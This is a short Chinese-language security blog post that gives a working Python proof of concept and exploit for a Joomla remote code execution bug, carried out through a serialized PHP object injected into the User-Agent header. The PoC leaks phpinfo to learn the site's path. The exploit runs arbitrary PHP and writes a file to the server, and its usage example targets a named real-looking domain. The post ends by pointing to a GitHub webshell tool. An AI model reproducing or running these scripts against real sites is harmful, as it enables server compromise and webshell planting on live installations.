cdxy.me
Footprints on Cyber Security and Python

 

poc

#!/usr/bin/python
# coding=utf-8
import urllib2
import cookielib
import sys


"""
python joomla.py http://example.com/
"""

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
urllib2.socket.setdefaulttimeout(10)

ua = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'

req = urllib2.Request(url=sys.argv[1], headers={'User-Agent': ua})
opener.open(req)
req = urllib2.Request(url=sys.argv[1])
content = opener.open(req).read()
if 'SERVER["REMOTE_ADDR"]' in content:
    print "vulnerable!"
    print content

该poc会返回发送两个包,第二个包的回显中含有目标站点的phpinfo()数据,我们从中获取到网站的绝对路径.

poc


exp

import requests
import re
import sys

url = sys.argv[1]
command = sys.argv[2]

"""
python exp.py http://www.schafx.de/ fputs\(fopen\(base64_decode\(L3Zhci93d3cvaHRtbC9hLnBocA\),w\),base64_decode\(PD9waHAgcGhwaW5mbygpID8\)\)

"""


def attack(uid):
    headers = {
        "User-Agent": '''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%s:"%s;JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86''' % (len(command) + 28, command)
    }
    s = requests.session()
    response = s.get(url='%s' % url, headers=headers)
    response = s.get(url='%s' % url)
    # response = s.post(url='%s' % url,data='a=')
    info = response.content
    return info

info = attack(url)
result = re.findall(r'</html>(.*)', info, re.S | re.I)
print result[0]
# print info

我们以上文获取到的绝对路径+xxx.php,并使用base64编码结果,构造payload,然后使用此py脚本发送之,即向指定的绝对路径写入文件.

exp richina


php-exp

https://github.com/whirlwind110/joomla-getshell-EXP 成功率略低,还是手动吧